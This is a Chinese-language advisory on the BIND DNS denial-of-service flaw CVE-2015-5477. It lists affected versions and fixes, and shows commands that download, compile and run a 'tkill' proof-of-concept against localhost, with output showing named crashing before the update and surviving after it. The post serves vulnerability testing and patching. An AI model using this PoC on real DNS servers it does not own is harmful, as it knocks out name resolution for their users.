DNS服务器软件BIND曝严重DoS漏洞(CVE-2015-5477)
漏洞描述
近期ISC发布了一个安全漏洞(cve-2015-5477),该漏洞影响当前Bind所有非最新版本,黑客可以利用该漏洞对BIND DNS服务进行DOS攻击,导致DNS服务进程结束。
漏洞影响
自编译版本 9.1.0 -> 9.8.x, 9.9.0->9.9.7-P1, 9.10.0->9.10.2-P2
Redhat AS6 版本 < bind-9.8.2-0.37.rc1.el6_7.2版本
Redhat AS5 版本 < bind-9.3.6-25.P1.el5_11.3 版本
漏洞测试
非常危险,请勿测试线上服务——存在漏洞的DNS服务守护进程会crash
A. 测试方法
[@ ~]# wget http://NOTVALID/script/tkill.c[@ ~]# gcc -g -o tkill tkill.c[@ ~]# chmod a+x tkill[@ ~]# ./tkill localhost#如DNS服务crash,说明该DNS存在漏洞,如出现 not vulnerable字样,则表示漏洞未生效。
B. 测试现象
[@ ~]# ./tkill localhost--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---[+] localhost: Resolving to IP address[+] localhost: Resolved to multiple IPs (NOTE)[+] ::1: Probing...[+] Querying version...[+] ::1: "9.11.0pre-alpha"[+] Sending DoS packet...[+] Waiting 5-sec for response...[+] timed out, probably crashed[+] 127.0.0.1: Probing...[+] Querying version...[-] timed out getting version, trying again[-] timed out getting version, trying again[-] timed out getting version, trying again[-] Can't query server, is it crashed already?[-] Sending exploit anyway.[+] Sending DoS packet...[+] Waiting 5-sec for response...[+] timed out, probably crashed
经检查named进程已经crash
C. 服务日志
Aug 4 15:32:48 dns named[2717]: client a.b.c. d#42212 (foo.bar): view north_america: query: foo. bar ANY TKEY + (x.y.z.zz)
解决方案:
升级到最新版,手动编译版本也可以打补丁。
官方网站貌似没有补丁包,可以从Redhat的FTP提供的srpm文件查找
[@ ~]# yum update bind
更新后的测试
[@ ~]# ./tkill localhost--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---[+] localhost: Resolving to IP address[+] localhost: Resolved to multiple IPs (NOTE)[+] 127.0.0.1: Probing...[+] Querying version...[+] 127.0.0.1: "9.3.6-P1-RedHat-9.3.6-25.P1.el5_11.3"[+] Sending DoS packet...[+] Waiting 5-sec for response...[-] 127.0.0.1: got response, so probably not vulnerable
相关链接:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477
http://www.isc.org/downloads
https://ring0.me/2015/08/exploit-dns-server-with-one-packet/